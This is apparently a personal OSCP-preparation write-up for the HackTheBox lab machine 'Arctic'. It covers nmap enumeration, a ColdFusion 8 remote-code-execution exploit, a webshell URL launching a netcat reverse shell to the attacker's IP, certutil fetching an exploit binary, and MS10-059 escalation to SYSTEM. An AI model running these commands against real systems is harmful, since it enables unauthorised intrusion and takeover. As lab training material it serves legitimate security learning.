Braindump
Read BlogpostsLet's Connect
  • Introduction: My OSCP Journey
  • Writeup Index
  • OSCP Machine Writeups
    • 🔥PG - Practice
      • Shenzi
      • DVR4
      • Resourced
      • Kevin
      • Nara
      • Jacko
      • Authby
      • Access
      • Internal
      • Hutch
      • Algernon
      • HelpDesk
      • Squid
      • Hepet
      • Craft2
      • ClamAV
      • Pelican
      • Payday
      • Snookums
      • Bratarina
      • Nibbles
      • Hetemit
      • Hawat
      • Astronaut
      • Exfiltrated
      • Fanatastic
      • Wombo
      • Levram
      • LaVita
    • 💣HackTheBox
      • Devel
      • Legacy
      • Intelligence
        • Learning
      • Blackfield
        • PrivEsc - SeBackupPrivilege
      • Sauna
      • Bastard
      • Arctic
      • Forest
      • Active
      • SecNotes
      • Access
  • Preparation Notes
    • Tips and Tricks
      • File Transfer
      • Download a file - Windows CLI
      • Bypassing Firewall/Defender/UAC
      • Accessing File
      • Reverse Shell
      • OneLiner - Reverse/bind Shell
      • OneLiner - MSFVenom
    • Enumeration Techniques
      • System and Network Enumeration
      • Web Enumeration
      • Service Enum
      • CMS
    • Exploitation
      • Exploiting Web Apps
      • Exploiting Wordpress
      • Public Exploits
    • Privilege Escalation
      • Linux Privilege Escalation
        • Disk Group PrivEsc
      • Windows Privilege Escalation
    • Active Directory
      • Enumeration
      • AD Attacks
      • mimikatz
      • Lateral movement
    • Pivoting and Networking
      • SSH Port Forwarding
      • Ligolo-ng
    • Password Cracking
Powered by GitBook
On this page
  • Summary
  • Enumeration
  • Initial Foothold
  • Privilege Escalation

Was this helpful?

  1. OSCP Machine Writeups
  2. HackTheBox

Arctic

PreviousBastardNextForest

Last updated 8 days ago

Was this helpful?

Summary

  • Discovered only three open ports: RPC on 135, another MSRPC on 49154, and port 8500 running Adobe ColdFusion 8.

  • Identified ColdFusion 8 as vulnerable to RCE using .

  • Gained a reverse shell via ColdFusion’s vulnerable REST endpoint.

  • Used windows-exploit-suggester to identify privilege escalation paths.

  • Chose MS10-059 for kernel-level privilege escalation.

  • Uploaded the exploit via certutil and popped a SYSTEM shell.


Enumeration

sudo nmap -A -sC -sV -T4 10.10.10.11 -p- -oN full_tcp.nmap

Nmap Output:

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?   (Coldfusion running here)
49154/tcp open  msrpc   Microsoft Windows RPC
  • Visiting http://10.10.10.11:8500 showed Adobe ColdFusion 8 interface.

  • ColdFusion 8 has known unauthenticated RCE exploits, particularly via FCKeditor or misconfigured endpoints.


Initial Foothold

  • Exploit works by uploading a .jsp webshell via the vulnerable file upload endpoint exposed in ColdFusion 8.

Steps:

  1. Modified exploit to upload reverse shell.

  2. Started a local HTTP server to host payload:

    bashCopyEditpython3 -m http.server 8888
  3. Payload logic:

    • Upload nc.exe to victim using certutil

    • Execute it using the uploaded .jsp web shell

Example access:

http://10.10.10.11:8500/userfiles/file.jsp?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.18 7777
  • Reverse shell landed on port 7777. Initial shell was low-privilege.


Privilege Escalation

Used windows-exploit-suggester to identify escalation paths:

python2 windows-exploit-suggester.py --database 2024-06-21-mssb.xls --systeminfo sysinfo.txt
  • Target identified as Windows 2008 R2 64-bit with no installed patches.

  • Chose exploit: MS10-059 – Vulnerability in the Tracing Feature for Services.

Uploaded the executable using certutil:

certutil -urlcache -f http://10.10.14.18:8888/exploit.exe exploit.exe

Ran the exploit with a listener on port 9999:

exploit.exe 10.10.14.18 9999

On attacker machine:

nc -nlvp 9999
  • SYSTEM reverse shell established 🎯

Used — Adobe ColdFusion 8 RCE exploit.

Downloaded compiled exploit from:

💣
Exploit-DB 50057
Exploit-DB 50057
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe